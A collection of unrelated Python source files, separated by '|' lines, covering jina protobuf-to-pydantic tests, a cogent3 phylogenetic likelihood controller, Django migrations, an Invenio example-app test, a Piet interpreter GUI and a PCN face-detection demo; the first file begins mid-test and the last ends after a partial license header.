PROTO_TO_PYDANTIC_MODELS.DenseNdArrayProto().schema()['properties']['shape'][
'type'
]
== 'array'
)
assert (
PROTO_TO_PYDANTIC_MODELS.NamedScoreProto().schema()['definitions'][
'NamedScoreProto'
]['properties']['operands']['type']
== 'array'
)
assert (
PROTO_TO_PYDANTIC_MODELS.DocumentProto().schema()['definitions'][
'DocumentProto'
]['properties']['chunks']['type']
== 'array'
)
def test_recursive_schema():
"""This tests: recursive schmea definions are represented properly"""
assert PROTO_TO_PYDANTIC_MODELS.NamedScoreProto().schema()['definitions'][
'NamedScoreProto'
]['properties']['operands']['items'] == {'$ref': '#/definitions/NamedScoreProto'}
def test_struct():
"""This tests: google.protobuf.Struct are represented as `object`"""
assert (
PROTO_TO_PYDANTIC_MODELS.DocumentProto().schema()['definitions'][
'DocumentProto'
]['properties']['tags']['type']
== 'object'
)
def test_timestamp():
"""This tests: google.protobuf.Timestamp are represented as date-time"""
assert (
PROTO_TO_PYDANTIC_MODELS.RouteProto().schema(by_alias=False)['properties'][
'start_time'
]['type']
== 'string'
)
assert (
PROTO_TO_PYDANTIC_MODELS.RouteProto().schema(by_alias=False)['properties'][
'start_time'
]['format']
== 'date-time'
)
def test_jina_document_to_pydantic_document():
document_proto_model = PROTO_TO_PYDANTIC_MODELS.DocumentProto
for jina_doc in random_docs(num_docs=10):
jina_doc = jina_doc.dict()
pydantic_doc = document_proto_model(**jina_doc)
assert jina_doc['text'] == pydantic_doc.text
assert jina_doc['mime_type'] == pydantic_doc.mime_type
assert (
jina_doc['embedding']['dense']['shape']
== pydantic_doc.embedding.dense.shape
)
assert (
jina_doc['embedding']['dense']['dtype']
== pydantic_doc.embedding.dense.dtype
)
for jina_doc_chunk, pydantic_doc_chunk in zip(
jina_doc['chunks'], pydantic_doc.chunks
):
assert jina_doc_chunk['id'] == pydantic_doc_chunk.id
assert jina_doc_chunk['tags'] == pydantic_doc_chunk.tags
assert jina_doc_chunk['text'] == pydantic_doc_chunk.text
assert jina_doc_chunk['mime_type'] == pydantic_doc_chunk.mime_type
assert jina_doc_chunk['parent_id'] == pydantic_doc_chunk.parent_id
assert jina_doc_chunk['granularity'] == pydantic_doc_chunk.granularity
def test_jina_document_to_pydantic_document_sparse():
document_proto_model = PROTO_TO_PYDANTIC_MODELS.DocumentProto
for jina_doc in random_docs(num_docs=10, sparse_embedding=True):
jina_doc = jina_doc.dict()
pydantic_doc = document_proto_model(**jina_doc)
assert jina_doc['text'] == pydantic_doc.text
assert jina_doc['mime_type'] == pydantic_doc.mime_type
assert (
jina_doc['embedding']['sparse']['indices']['buffer']
== pydantic_doc.embedding.sparse.indices.buffer.decode()
)
assert (
jina_doc['embedding']['sparse']['indices']['shape']
== pydantic_doc.embedding.sparse.indices.shape
)
assert (
jina_doc['embedding']['sparse']['indices']['dtype']
== pydantic_doc.embedding.sparse.indices.dtype
)
assert (
jina_doc['embedding']['sparse']['values']['buffer']
== pydantic_doc.embedding.sparse.values.buffer.decode()
)
assert (
jina_doc['embedding']['sparse']['values']['shape']
== pydantic_doc.embedding.sparse.values.shape
)
assert (
jina_doc['embedding']['sparse']['values']['dtype']
== pydantic_doc.embedding.sparse.values.dtype
)
for jina_doc_chunk, pydantic_doc_chunk in zip(
jina_doc['chunks'], pydantic_doc.chunks
):
assert jina_doc_chunk['id'] == pydantic_doc_chunk.id
assert jina_doc_chunk['tags'] == pydantic_doc_chunk.tags
assert jina_doc_chunk['text'] == pydantic_doc_chunk.text
assert jina_doc_chunk['mime_type'] == pydantic_doc_chunk.mime_type
assert jina_doc_chunk['parent_id'] == pydantic_doc_chunk.parent_id
assert jina_doc_chunk['granularity'] == pydantic_doc_chunk.granularity
def test_pydatic_document_to_jina_document():
document_proto_model = PROTO_TO_PYDANTIC_MODELS.DocumentProto
jina_doc = Document(document_proto_model(text='abc').json())
assert jina_doc.text == 'abc'
assert jina_doc.content == 'abc'
jina_doc = Document(document_proto_model(text='abc').dict())
assert jina_doc.text == 'abc'
assert jina_doc.content == 'abc'
@pytest.mark.parametrize('top_k', [5, 10])
def test_model_with_top_k(top_k):
m = JinaRequestModel(data=['abc'], parameters={'top_k': top_k})
assert m.parameters['top_k'] == top_k
m = JinaRequestModel(parameters={'top_k': top_k})
assert m.parameters['top_k'] == top_k
|
#!/usr/bin/env python
"""
This file defines a class for controlling the scope and heterogeneity of
parameters involved in a maximum-likelihood based tree analysis.
"""
import pickle
import warnings
import numpy
from cogent3.align import dp_calculation
from cogent3.align.pairwise import AlignableSeq
from cogent3.core.tree import TreeError
from cogent3.evolve import likelihood_calculation
from cogent3.evolve.likelihood_function import LikelihoodFunction as _LF
from cogent3.maths.stats.information_criteria import aic, bic
from cogent3.recalculation.scope import _indexed
from cogent3.util.misc import adjusted_gt_minprob
from cogent3.util.warning import deprecated, discontinued
__author__ = "Peter Maxwell"
__copyright__ = "Copyright 2007-2019, The Cogent Project"
__credits__ = ["Andrew Butterfield", "Peter Maxwell", "Gavin Huttley", "Helen Lindsay"]
__license__ = "BSD-3"
__version__ = "2019.9.13a"
__maintainer__ = "Gavin Huttley"
__email__ = "gavin.huttley@anu.ed.au"
__status__ = "Production"
def _category_names(dimension, specified):
if type(specified) is int:
cats = ["%s%s" % (dimension, i) for i in range(specified)]
else:
cats = tuple(specified)
assert len(cats) >= 1, cats
assert len(set(cats)) == len(cats), "%s names must be unique" % dimension
return list(cats)
def load(filename):
# first cut at saving pc's
f = open(filename, "rb")
(version, info, pc) = pickle.load(f)
assert version < 2.0, version
pc.update_intermediate_values()
return pc
class _LikelihoodParameterController(_LF):
"""A ParameterController works by setting parameter rules. For each
parameter in the model the edges of the tree are be partitioned into groups
that share one value.
For usage see the set_param_rule method.
"""
    # Basically a wrapper around the more generic recalculation.ParameterController
# class, which doesn't know about trees.
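    # A minimal usage sketch (hypothetical names, not taken from this module): a
    # parameter controller is normally obtained from a substitution model, e.g.
    #
    #     lf = model.make_likelihood_function(tree)
    #     lf.set_param_rule("length", edge="Human", init=0.1)
    #     lf.set_alignment(aln)
    #     lf.optimise()
    #
    # where `model`, `tree` and `aln` are assumed to be a cogent3 substitution
    # model, a tree and an alignment, respectively.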
def __init__(
self,
model,
tree,
bins=1,
loci=1,
optimise_motif_probs=False,
motif_probs_from_align=False,
**kw,
):
# cache of arguments used to construct
self._serialisable = locals()
for key in ("self", "__class__", "kw"):
self._serialisable.pop(key)
self._serialisable.update(kw)
self.model = self._model = model
self.tree = self._tree = tree
self.seq_names = tree.get_tip_names()
self.locus_names = _category_names("locus", loci)
self.bin_names = _category_names("bin", bins)
self.posn_names = [str(i) for i in range(model.word_length)]
self.motifs = self._motifs = model.get_motifs()
self._mprob_motifs = list(model.get_mprob_alphabet())
defn = self.make_likelihood_defn(**kw)
super(_LF, self).__init__(defn)
self.set_default_param_rules()
self.set_default_tree_parameter_rules()
self.mprobs_from_alignment = motif_probs_from_align
self.optimise_motif_probs = optimise_motif_probs
self._name = ""
self._format = {}
def save(self, filename):
with open(filename, "w") as f:
temp = {}
try:
for d in self.defns:
temp[id(d)] = d.values
del d.values
pickle.dump((1.0, None, self), f)
finally:
for d in self.defns:
if id(d) in temp:
d.values = temp[id(d)]
def set_default_tree_parameter_rules(self):
"""Lengths are set to the values found in the tree (if any), and
free to be optimised independently.
Other parameters are scoped based on the unique values found in the
tree (if any) or default to having one value shared across the whole
tree"""
with self.updates_postponed():
edges = self.tree.get_edge_vector()
for par_name in self.model.get_param_list():
try:
values = dict(
[
(edge.name, edge.params[par_name])
for edge in edges
if not edge.isroot()
]
)
(uniq, index) = _indexed(values)
except KeyError:
continue # new parameter
for (u, value) in enumerate(uniq):
group = [edge for (edge, i) in list(index.items()) if i == u]
self.set_param_rule(par_name, edges=group, init=value)
for edge in edges:
if edge.length is not None:
try:
self.set_param_rule("length", edge=edge.name, init=edge.length)
except KeyError:
# hopefully due to being a discrete model
warnings.warn("Ignoring tree edge lengths", stacklevel=4)
break
def set_motif_probs_from_data(
self,
align,
locus=None,
is_constant=None,
include_ambiguity=False,
is_independent=None,
auto=False,
pseudocount=None,
**kwargs,
):
counts = self.model.count_motifs(align, include_ambiguity=include_ambiguity)
if is_constant is None:
is_constant = not self.optimise_motif_probs
if pseudocount is None:
if is_constant:
pseudocount = 0.0
else:
pseudocount = 0.5
counts += pseudocount
mprobs = counts / (1.0 * sum(counts))
self.set_motif_probs(
mprobs,
locus=locus,
is_constant=is_constant,
is_independent=is_independent,
auto=auto,
**kwargs,
)
def set_motif_probs(
self,
motif_probs,
locus=None,
bin=None,
is_constant=None,
is_independent=None,
auto=False,
**kwargs,
):
motif_probs = self.model.adapt_motif_probs(motif_probs, auto=auto)
motif_probs = adjusted_gt_minprob(motif_probs, minprob=1e-6)
if is_constant is None:
is_constant = not self.optimise_motif_probs
self.model.set_param_controller_motif_probs(
self,
motif_probs,
is_constant=is_constant,
bin=bin,
locus=locus,
is_independent=is_independent,
**kwargs,
)
if not auto:
self.mprobs_from_alignment = False # should be done per-locus
def set_expm(self, expm):
assert expm in ["pade", "either", "eigen", "checked"], expm
self.set_param_rule("expm", is_constant=True, value=expm)
def make_calculator(self, **kw):
return super(_LF, self).make_calculator(**kw)
def _process_scope_info(
self,
edge=None,
tip_names=None,
edges=None,
clade=None,
stem=None,
outgroup_name=None,
):
"""From information specifying the scope of a parameter derive a list of
edge names"""
if edges is not None:
if tip_names or edge:
raise TreeError("Only ONE of edge, edges or tip_names")
elif edge is not None:
if tip_names:
raise TreeError("Only ONE of edge, edges or tip_names")
edges = [edge]
elif tip_names is None:
edges = None # meaning all edges
elif len(tip_names) != 2:
raise TreeError("tip_names must contain 2 species")
else:
(species1, species2) = tip_names
if stem is None:
stem = False
if clade is None:
clade = not stem
edges = self.tree.get_edge_names(
species1, species2, stem=stem, clade=clade, outgroup_name=outgroup_name
)
return edges
def apply_param_rules(self, rules):
"""batch applies a collection of param rules"""
with self.updates_postponed():
for rule in rules:
self.set_param_rule(**rule)
def set_time_heterogeneity(
self,
exclude_params=None,
edge_sets=None,
is_independent=None,
is_constant=False,
value=None,
lower=None,
init=None,
upper=None,
):
"""modifes the scope of all submodel rate, aside from excluded params,
by constructing a list of parameter rules and using the
apply_param_rules method
Parameters
----------
exclude_params
name(s) of substitution model predicate(s) to be excluded
edge_sets
            series of dicts with an 'edges' key. Can also specify
            is_independent, is_constant etc. If those are not provided, the
            method argument values are applied
is_independent : bool
whether edges in all edge sets are to be considered independent.
default is False
Overridden by edge_sets values.
is_constant : bool
makes constant all rate term parameters for all edge sets.
Overridden by edge_sets values.
value
value for constant parameters, only valid when is_constant.
Overridden by edge_sets values.
lower, init, upper
lower bound, starting value, upper bound for all parameters for
all edge sets. Only valid if not is_constant.
Overridden by edge_sets values.
"""
if is_constant and any([lower, init, upper]):
raise ValueError("cannot specify bounds or init for a constant param")
if is_constant:
kwargs = dict(is_constant=True, value=value)
else:
kwargs = dict(
is_independent=is_independent, init=init, lower=lower, upper=upper
)
rate_terms = self._model.get_param_list()
exclude_params = exclude_params or []
if exclude_params and type(exclude_params) == str:
exclude_params = [exclude_params]
for param in exclude_params:
if param not in rate_terms:
raise ValueError(f"'{param}' not a valid rate param")
rate_terms.remove(param)
if edge_sets is None:
# this just makes the following algorithm consistent
edge_sets = [
dict(edges=[n]) for n in self.tree.get_node_names(includeself=False)
]
elif type(edge_sets) == dict:
edge_sets = [edge_sets]
# we make param rules
param_rules = []
for edge_set in edge_sets:
edges = edge_set.get("edges", None)
if type(edges) == str:
edges = [edges]
if edges:
edges = list(edges)
edge_set["edges"] = edges
rule_base = kwargs.copy()
rule_base.update(edge_set)
for param in rate_terms:
rule = rule_base.copy()
rule.update(dict(par_name=param))
param_rules.append(rule)
self.apply_param_rules(param_rules)
def set_param_rule(
self,
par_name,
is_independent=None,
is_constant=False,
value=None,
lower=None,
init=None,
upper=None,
**scope_info,
):
"""Define a model constraint for par_name. Parameters can be set
constant or split according to tree/bin scopes.
Parameters
----------
par_name
The model parameter being modified.
is_constant, value
if True, the parameter is held constant at
            value, if provided, or the likelihood function's current value.
is_independent
whether the partition specified by scope/bin
arguments are to be considered independent.
lower, init, upper
specify the lower bound, initial value and
upper bound for optimisation. Can be set separately.
bin, bins
the name(s) of the bin to apply rule.
locus, loci
the name of the locus/loci to apply rule.
**scope_info
tree scope arguments
- edge, edges: The name of the tree edge(s) affected by rule.
- tip_names: a tuple of two tip names, specifying a tree scope
to apply rule.
- outgroup_name: A tip name that, provided along with tip_names,
ensures a consistently specified tree scope.
- clade: The rule applies to all edges descending from the most
recent common ancestor defined by the tip_names+outgroup_name
arguments.
- stem: The rule applies to the edge preceding the most recent
common ancestor defined by the tip_names+outgroup_name
arguments.
"""
par_name = str(par_name)
scopes = {}
for (single, plural) in [
("bin", "bins"),
("locus", "loci"),
("position", "positions"),
("motif", "motifs"),
]:
if single in scope_info:
v = scope_info.pop(single)
if v:
assert isinstance(v, str), "%s=, maybe?" % plural
assert plural not in scope_info
scopes[single] = [v]
elif plural in scope_info:
v = scope_info.pop(plural)
if v:
scopes[single] = v
edges = self._process_scope_info(**scope_info)
if edges:
scopes["edge"] = edges
if is_constant:
assert not (init or lower or upper)
elif init is not None:
assert not value
value = init
self.assign_all(
par_name, scopes, value, lower, upper, is_constant, is_independent
)
def set_local_clock(self, tip1name, tip2name):
"""Constrain branch lengths for tip1name and tip2name to be equal.
This is a molecular clock condition. Currently only valid for tips
connected to the same node.
        Note: This is just a convenient interface to set_param_rule.
"""
self.set_param_rule(
"length", tip_names=[tip1name, tip2name], clade=True, is_independent=0
)
def set_constant_lengths(self, tree=None, exclude_list=None):
"""Constrains edge lengths to those in the tree.
Parameters
----------
tree
must have the same topology as the current model.
            If not provided, the current tree's lengths are used.
exclude_list
            a list of edge names whose branch lengths
            will not be constrained.
"""
exclude_list = exclude_list or []
if tree is None:
tree = self.tree
with self.updates_postponed():
for edge in tree.get_edge_vector():
if edge.length is None or edge.name in exclude_list:
continue
self.set_param_rule(
"length", edge=edge.name, is_constant=1, value=edge.length
)
def get_aic(self, second_order=False):
"""returns Aikake Information Criteria
Parameters
----------
second_order
if true, the second
adjusted by the alignment length
"""
if second_order:
sequence_length = sum(
len(self.get_param_value("lht", locus=l).index)
for l in self.locus_names
)
else:
sequence_length = None
lnL = self.get_log_likelihood()
nfp = self.get_num_free_params()
return aic(lnL, nfp, sequence_length)
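    # For reference, with lnL the log-likelihood, k the number of free parameters
    # and n the sequence length: AIC = 2k - 2 lnL, the second-order form adds
    # 2k(k + 1)/(n - k - 1), and BIC = k ln(n) - 2 lnL.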
def get_bic(self):
"""returns the Bayesian Information Criteria"""
sequence_length = sum(
len(self.get_param_value("lht", locus=l).index) for l in self.locus_names
)
lnL = self.get_log_likelihood()
nfp = self.get_num_free_params()
return bic(lnL, nfp, sequence_length)
class AlignmentLikelihoodFunction(_LikelihoodParameterController):
def set_default_param_rules(self):
try:
self.assign_all("fixed_motif", None, value=-1, const=True, independent=True)
except KeyError:
pass
def make_likelihood_defn(self, sites_independent=True, discrete_edges=None):
defns = self.model.make_param_controller_defns(bin_names=self.bin_names)
if discrete_edges is not None:
from .discrete_markov import PartialyDiscretePsubsDefn
defns["psubs"] = PartialyDiscretePsubsDefn(
self.motifs, defns["psubs"], discrete_edges
)
return likelihood_calculation.make_total_loglikelihood_defn(
self.tree,
defns["align"],
defns["psubs"],
defns["word_probs"],
defns["bprobs"],
self.bin_names,
self.locus_names,
sites_independent,
)
def set_alignment(self, aligns, motif_pseudocount=None):
"""set the alignment to be used for computing the likelihood."""
if type(aligns) is not list:
aligns = [aligns]
assert len(aligns) == len(self.locus_names), len(aligns)
tip_names = set(self.tree.get_tip_names())
for index, aln in enumerate(aligns):
if len(aligns) > 1:
locus_name = "for locus '%s'" % self.locus_names[index]
else:
locus_name = ""
assert not set(aln.names).symmetric_difference(tip_names), (
"Tree tip names %s and aln seq names %s don't match %s"
% (self.tree.get_tip_names(), aln.names, locus_name)
)
assert "root" not in aln.names, "'root' is a reserved name."
with self.updates_postponed():
for (locus_name, align) in zip(self.locus_names, aligns):
self.assign_all(
"alignment", {"locus": [locus_name]}, value=align, const=True
)
if self.mprobs_from_alignment:
self.set_motif_probs_from_data(
align,
locus=locus_name,
auto=True,
pseudocount=motif_pseudocount,
)
class SequenceLikelihoodFunction(_LikelihoodParameterController):
def set_default_param_rules(self):
pass
def make_likelihood_defn(
self, sites_independent=None, with_indel_params=True, kn=True
):
assert sites_independent is None or not sites_independent
assert len(self.locus_names) == 1
return dp_calculation.make_forward_tree_defn(
self.model,
self.tree,
self.bin_names,
with_indel_params=with_indel_params,
kn=kn,
)
def set_sequences(self, seqs, locus=None):
from cogent3.core.alignment import SequenceCollection
leaves = {}
if isinstance(seqs, SequenceCollection):
seqs = seqs.named_seqs
for (name, seq) in list(seqs.items()):
            # if it has uniq, it is probably already a likelihood tree leaf object
if hasattr(seq, "uniq"):
# XXX more checks - same alphabet as model, name etc ...
leaf = seq
else:
leaf = self.model.convert_sequence(seq, name)
leaf = AlignableSeq(leaf)
leaves[name] = leaf
assert name != "root", "'root' is a reserved name."
self.set_pogs(leaves, locus=locus)
def set_pogs(self, leaves, locus=None):
with self.updates_postponed():
for (name, pog) in list(leaves.items()):
self.set_param_rule("leaf", edge=name, value=pog, is_constant=True)
if self.mprobs_from_alignment:
counts = numpy.sum(
[pog.leaf.get_motif_counts() for pog in list(leaves.values())], 0
)
mprobs = counts / (1.0 * sum(counts))
self.set_motif_probs(mprobs, locus=locus, is_constant=True, auto=True)
|
# Generated by Django 3.2.4 on 2021-07-05 08:34
import django.contrib.postgres.fields
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = []
operations = [
migrations.CreateModel(
name="MusicalWork",
fields=[
(
"id",
models.BigAutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("title", models.CharField(max_length=60, null=True)),
(
"contributors",
django.contrib.postgres.fields.ArrayField(
base_field=models.CharField(max_length=60), size=None
),
),
("iswc", models.CharField(max_length=11, null=True, unique=True)),
],
),
]
|
# -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2015-2018 CERN.
#
# cds-migrator-kit is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""Test example app."""
import os
import signal
import subprocess
import time
from os.path import abspath, dirname, join
import pytest
@pytest.yield_fixture
def example_app():
"""Example app fixture."""
current_dir = os.getcwd()
# Go to example directory
project_dir = dirname(dirname(abspath(__file__)))
exampleapp_dir = join(project_dir, 'examples')
os.chdir(exampleapp_dir)
# Setup application
assert subprocess.call('./app-setup.sh', shell=True) == 0
# Start example app
webapp = subprocess.Popen(
'FLASK_APP=app.py flask run --debugger -p 5000',
stdout=subprocess.PIPE, preexec_fn=os.setsid, shell=True)
time.sleep(10)
yield webapp
# Stop server
os.killpg(webapp.pid, signal.SIGTERM)
# Return to the original directory
os.chdir(current_dir)
def test_example_app_role_admin(example_app):
"""Test example app."""
cmd = 'curl http://0.0.0.0:5000/'
output = subprocess.check_output(cmd, shell=True)
assert b'migrator' in output
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.8 on 2018-03-20 06:22
from __future__ import unicode_literals
from django.db import migrations, models
import uuid
class Migration(migrations.Migration):
dependencies = [
('flowcells', '0005_auto_20180319_0947'),
]
operations = [
migrations.AddField(
model_name='barcodeset',
name='uuid',
field=models.UUIDField(default=uuid.uuid4, editable=False),
),
migrations.AddField(
model_name='barcodesetentry',
name='uuid',
field=models.UUIDField(default=uuid.uuid4, editable=False),
),
migrations.AddField(
model_name='flowcell',
name='uuid',
field=models.UUIDField(default=uuid.uuid4, editable=False),
),
migrations.AddField(
model_name='library',
name='uuid',
field=models.UUIDField(default=uuid.uuid4, editable=False),
),
migrations.AddField(
model_name='sequencingmachine',
name='uuid',
field=models.UUIDField(default=uuid.uuid4, editable=False),
),
]
|
import pygubu
import os
from interpreter import imageFunctions as imageWrapper
from interpreter import lexer as lexer
from interpreter import executeFunctions as main
from interpreter.dataStructures import programState, direction, position
from GUI import infoManager
from GUI import canvasManager
class GUI:
def __init__(self):
# In pixelWidth/height per pixel. scaleSize = 25 means that every pixel will show as a 25x25 square
self.scaleSize = 15
# In percentage
self.executionSpeed = 15
# In seconds
self.maxWait = 5
self.image = None
self.graph = None
self.programState = None
self.selectedPosition = None
self.optionBar = None
self.actionBar = None
self.content = None
self.canvas = None
#1: Create a builder
self.builder = pygubu.Builder()
#2: Load an ui file
self.builder.add_from_file("{}/tkinterLayout.ui".format(os.path.abspath(os.path.dirname(__file__))))
#3: Create the mainwindow
self.mainwindow = self.builder.get_object('rootWindow')
self.initializeFrames()
self.initializeCallbacks()
self.infoManager = infoManager.infoManager(self.builder, self.generalInfoFrame, self.programStateInfoFrame)
self.canvasManager = canvasManager.canvasManager(self.canvas, self.image, self.programState, self.scaleSize)
def run(self):
self.mainwindow.mainloop()
def initializeCallbacks(self):
self.builder.connect_callbacks({
'loadFile': self.loadFile,
'setScale': self.setScale,
'takeStep': self.takeStep
})
horizontalBar = self.builder.get_object("canvasHorizontalScroll", self.canvasFrame)
verticalBar = self.builder.get_object("canvasVerticalScroll", self.canvasFrame)
horizontalBar.config(command = self.canvas.xview)
verticalBar.config(command = self.canvas.yview)
self.canvas.config(xscrollcommand=horizontalBar.set, yscrollcommand=verticalBar.set)
self.canvas.configure(scrollregion=self.canvas.bbox("all"))
def initializeFrames(self):
self.optionBar = self.builder.get_object('optionBar', self.mainwindow)
self.content = self.builder.get_object('content', self.mainwindow)
self.actionBar = self.builder.get_object('actionBar', self.mainwindow)
self.generalInfoFrame = self.builder.get_object("generalInfoFrame", self.content)
self.programStateInfoFrame = self.builder.get_object("programStateInfoFrame", self.content)
self.canvasFrame = self.builder.get_object('canvasFrame', self.content)
self.canvas = self.builder.get_object('canvas', self.canvasFrame)
def update(self):
self.infoManager.updateInfo(self.image, self.graph, self.programState)
self.canvasManager.updateScaleSize(self.scaleSize)
self.canvasManager.updateImage(self.image)
self.canvasManager.updateProgramState(self.programState)
self.canvasManager.updateCanvas()
self.canvas.configure(scrollregion=self.canvas.bbox("all"))
def takeStep(self):
if self.image is None or self.programState is None or self.graph is None:
return None
newProgramState = main.takeStep(self.image, self.programState)
# Error encountered, close window
if isinstance(newProgramState, BaseException):
self.mainwindow.destroy()
self.mainwindow.quit()
raise newProgramState
self.programState = newProgramState
self.selectedPosition = self.programState.position
self.update()
return True
def setFileText(self, filePath):
self.builder.get_object("fileNameEntry", self.optionBar).delete(0, len(self.builder.get_object("fileNameEntry", self.optionBar).get()))
self.builder.get_object("fileNameEntry", self.optionBar).insert(0, filePath)
def setExecutionSpeed(self, pos):
if 0 < float(pos) < 100:
self.executionSpeed = float(pos)
def setScale(self):
scaleValue = int(self.builder.get_object('scaleEntry', self.optionBar).get())
if 0 < scaleValue < 100:
self.canvasManager.clearCanvas()
self.scaleSize = int(scaleValue)
self.update()
self.canvasManager.drawImage()
self.canvasManager.updateCanvas()
def loadFile(self):
fileName = self.builder.get_object('fileNameEntry', self.optionBar).get()
if len(fileName) < 1:
return None
try:
tmpImage = imageWrapper.getImage(fileName)
except FileNotFoundError:
edgeInfo = self.infoManager.builder.get_object('codelEdgesMessage', self.infoManager.generalInfo)
edgeInfo.configure(text="The file '{}' could not be found".format(fileName))
return False
tmpResult = lexer.graphImage(tmpImage)
if len(tmpResult[1]) != 0:
edgeInfo = self.infoManager.builder.get_object('codelEdgesMessage', self.infoManager.generalInfo)
edgeInfo.configure(text="The following exceptions occured while making the graph:\n{}".format("".join(list(map(lambda x: "\t{}\n".format(x), tmpResult[1])))))
return False
self.image = tmpImage
self.graph = tmpResult[0]
self.programState = programState(self.graph, position((0,0)), direction((0,0)))
# Reset previous state
self.canvasManager.previousProgramState = None
self.canvasManager.programState = None
self.update()
|
#!/usr/bin/python3
from ctypes import *
import cv2
import numpy as np
import sys
import os
import time
from ipdb import set_trace as dbg
from enum import IntEnum
class CPoint(Structure):
_fields_ = [("x", c_int),
("y", c_int)]
FEAT_POINTS = 14
class CWindow(Structure):
_fields_ = [("x", c_int),
("y", c_int),
("width", c_int),
("angle", c_int),
("score", c_float),
("points",CPoint*FEAT_POINTS)]
class FeatEnam(IntEnum):
CHIN_0 = 0
CHIN_1 = 1
CHIN_2 = 2
CHIN_3 = 3
CHIN_4 = 4
CHIN_5 = 5
CHIN_6 = 6
CHIN_7 = 7
CHIN_8 = 8
NOSE = 9
EYE_LEFT = 10
EYE_RIGHT = 11
MOUTH_LEFT = 12
MOUTH_RIGHT = 13
FEAT_POINTS = 14
lib = CDLL("/usr/local/lib/libPCN.so")
init_detector = lib.init_detector
#void *init_detector(const char *detection_model_path,
# const char *pcn1_proto, const char *pcn2_proto, const char *pcn3_proto,
# const char *tracking_model_path, const char *tracking_proto,
# int min_face_size, float pyramid_scale_factor, float detection_thresh_stage1,
# float detection_thresh_stage2, float detection_thresh_stage3, int tracking_period,
# float tracking_thresh, int do_smooth)
init_detector.argtypes = [
c_char_p, c_char_p, c_char_p,
c_char_p, c_char_p, c_char_p,
c_int,c_float,c_float,c_float,
c_float,c_int,c_float,c_int]
init_detector.restype = c_void_p
#CWindow* detect_faces(void* pcn, unsigned char* raw_img,size_t rows, size_t cols, int *lwin)
detect_faces = lib.detect_faces
detect_faces.argtypes = [c_void_p, POINTER(c_ubyte),c_size_t,c_size_t,POINTER(c_int)]
detect_faces.restype = POINTER(CWindow)
#CWindow* detect_track_faces(void* pcn, unsigned char* raw_img,size_t rows, size_t cols, int *lwin)
detect_track_faces = lib.detect_track_faces
detect_track_faces.argtypes = [c_void_p, POINTER(c_ubyte),c_size_t,c_size_t,POINTER(c_int)]
detect_track_faces.restype = POINTER(CWindow)
#void free_faces(CWindow* wins)
free_faces = lib.free_faces
free_faces.argtypes= [c_void_p]
# void free_detector(void *pcn)
free_detector = lib.free_detector
free_detector.argtypes= [c_void_p]
CYAN=(255,255,0)
BLUE=(255,0,0)
RED=(0,0,255)
GREEN=(0,255,0)
YELLOW=(0,255,255)
def DrawFace(win,img):
width = 2
x1 = win.x
y1 = win.y
x2 = win.width + win.x - 1
y2 = win.width + win.y - 1
centerX = (x1 + x2) / 2
centerY = (y1 + y2) / 2
angle = win.angle
R = cv2.getRotationMatrix2D((centerX,centerY),angle,1)
pts = np.array([[x1,y1,1],[x1,y2,1],[x2,y2,1],[x2,y1,1]], np.int32)
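    # Each corner is expressed in homogeneous coordinates [x, y, 1], so multiplying
    # by the transpose of the 2x3 affine matrix R rotates it about the box centre.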
pts = (pts @ R.T).astype(int) #Rotate points
pts = pts.reshape((-1,1,2))
cv2.polylines(img,[pts],True,CYAN,width)
cv2.line(img, (pts[0][0][0],pts[0][0][1]), (pts[3][0][0],pts[3][0][1]), BLUE, width)
def DrawPoints(win,img):
width = 2
f = FeatEnam.NOSE
cv2.circle(img,(win.points[f].x,win.points[f].y),width,GREEN,-1)
f = FeatEnam.EYE_LEFT
cv2.circle(img,(win.points[f].x,win.points[f].y),width,YELLOW,-1)
f = FeatEnam.EYE_RIGHT
cv2.circle(img,(win.points[f].x,win.points[f].y),width,YELLOW,-1)
f = FeatEnam.MOUTH_LEFT
cv2.circle(img,(win.points[f].x,win.points[f].y),width,RED,-1)
f = FeatEnam.MOUTH_RIGHT
cv2.circle(img,(win.points[f].x,win.points[f].y),width,RED,-1)
for i in range(8):
cv2.circle(img,(win.points[i].x,win.points[i].y),width,BLUE,-1)
def SetThreadCount(threads):
os.environ['OMP_NUM_THREADS'] = str(threads)
def c_str(str_in):
return c_char_p(str_in.encode('utf-8'))
video_flag = 0
if __name__=="__main__":
SetThreadCount(1)
path = '/usr/local/share/pcn/'
detection_model_path = c_str(path + "PCN.caffemodel")
pcn1_proto = c_str(path + "PCN-1.prototxt")
pcn2_proto = c_str(path + "PCN-2.prototxt")
pcn3_proto = c_str(path + "PCN-3.prototxt")
tracking_model_path = c_str(path + "PCN-Tracking.caffemodel")
tracking_proto = c_str(path + "PCN-Tracking.prototxt")
if video_flag:
cap = cv2.VideoCapture(0)
detector = init_detector(detection_model_path,pcn1_proto,pcn2_proto,pcn3_proto,
tracking_model_path,tracking_proto,
40,1.45,0.5,0.5,0.98,30,0.9,1)
width = cap.get(cv2.CAP_PROP_FRAME_WIDTH)
height = cap.get(cv2.CAP_PROP_FRAME_HEIGHT)
fps = cap.get(cv2.CAP_PROP_FPS)
while cap.isOpened():
ret, frame = cap.read()
if ret == False:
break
start = time.time()
face_count = c_int(0)
raw_data = frame.ctypes.data_as(POINTER(c_ubyte))
windows = detect_track_faces(detector, raw_data,
int(height), int(width),
pointer(face_count))
end = time.time()
for i in range(face_count.value):
DrawFace(windows[i],frame)
DrawPoints(windows[i],frame)
free_faces(windows)
fps = int(1 / (end - start))
cv2.putText(frame, str(fps) + "fps", (20, 45), 4, 1, (0, 0, 125))
cv2.imshow('PCN', frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
else:
detector = init_detector(detection_model_path,pcn1_proto,pcn2_proto,pcn3_proto,
tracking_model_path,tracking_proto,
40,1.45,0.5,0.5,0.98,30,0.9,0)
for i in range(1, 27):
frame = cv2.imread("imgs/" + str(i) + ".jpg")
start = time.time()
face_count = c_int(0)
raw_data = frame.ctypes.data_as(POINTER(c_ubyte))
windows = detect_faces(detector, raw_data,
frame.shape[0], frame.shape[1],
pointer(face_count))
end = time.time()
print(i, end - start, "s")
for i in range(face_count.value):
DrawFace(windows[i],frame)
DrawPoints(windows[i],frame)
free_faces(windows)
cv2.imshow('PCN', frame)
cv2.waitKey()
free_detector(detector)
|
# -*- coding: utf-8 -*-
#
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
